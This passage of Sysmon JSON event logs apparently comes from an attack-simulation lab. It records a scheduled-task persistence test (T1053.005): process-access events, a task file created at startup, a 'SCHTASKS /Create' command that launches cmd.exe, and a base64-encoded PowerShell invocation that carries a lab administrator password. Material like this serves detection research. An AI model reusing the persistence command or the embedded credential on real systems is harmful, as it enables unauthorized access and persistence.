06:55:19.182","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010F6570800}","TargetProcessId":"2604","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5719,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.182\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010F6570800}\r\nTargetProcessId: 2604\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.182","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010F6570800}","TargetProcessId":"2604","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5720,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.182\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010F6570800}\r\nTargetProcessId: 2604\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.182","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010F6570800}","TargetProcessId":"2604","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5721,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: T1053\r\nUtcTime: 2020-08-01 06:55:19.197\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nProcessId: 1140\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetFilename: C:\\Windows\\System32\\Tasks\\T1053_005_OnStartup\r\nCreationUtcTime: 2020-08-01 06:55:19.197","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"T1053","UtcTime":"2020-08-01 06:55:19.197","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","Image":"C:\\Windows\\system32\\svchost.exe","TargetFilename":"C:\\Windows\\System32\\Tasks\\T1053_005_OnStartup","CreationUtcTime":"2020-08-01 06:55:19.197","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5722,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.248\r\nProcessGuid: {E2A3D6B1-11D7-5F25-0000-0010355A0800}\r\nProcessId: 4292\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"SCHTASKS /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nParentProcessId: 4848\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgAkAG0AeQBBAHIAZwBzACAAPQAgAEAAewAgACIAdQBzAGUAcgBfAG4AYQBtAGUAIgAgAD0AIAAiAEEAVABUAEEAQwBLAFIAQQBOAEcARQBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgA7ACAAIgBwAGEAcwBzAHcAbwByAGQAIgAgAD0AIAAiAEkALQBsADEAawBlAC0AQQB0AHQAYQBjAGsALQBSAGEAbgBnAGUAIQAiACAAfQAKAEkAbgB2AG8AawBlAC0AQQB0AG8AbQBpAGMAVABlAHMAdAAgACIAVAAxADAANQAzAC4AMAAwADUAIgAgAC0ASQBuAHAAdQB0AEEAcgBnAHMAIAAkAG0AeQBBAHIAZwBzACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.248","ProcessGuid":"{E2A3D6B1-11D7-5F25-0000-0010355A0800}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"SCHTASKS /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","ParentProcessId":"4848","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgAkAG0AeQBBAHIAZwBzACAAPQAgAEAAewAgACIAdQBzAGUAcgBfAG4AYQBtAGUAIgAgAD0AIAAiAEEAVABUAEEAQwBLAFIAQQBOAEcARQBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgA7ACAAIgBwAGEAcwBzAHcAbwByAGQAIgAgAD0AIAAiAEkALQBsADEAawBlAC0AQQB0AHQAYQBjAGsALQBSAGEAbgBnAGUAIQAiACAAfQAKAEkAbgB2AG8AawBlAC0AQQB0AG8AbQBpAGMAVABlAHMAdAAgACIAVAAxADAANQAzAC4AMAAwADUAIgAgAC0ASQBuAHAAdQB0AEEAcgBnAHMAIAAkAG0AeQBBAHIAZwBzACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5723,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nSourceProcessId: 4848\r\nSourceThreadId: 1100\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010355A0800}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978635cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978e5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98314fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97824823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97882cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978661e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978912fd(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","SourceProcessId":"4848","SourceThreadId":"1100","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010355A0800}","TargetProcessId":"4292","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffa4(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978635cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978e5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98314fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97824823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97882cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978661e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978912fd(wow64)","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5724,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010355A0800}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010355A0800}","TargetProcessId":"4292","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
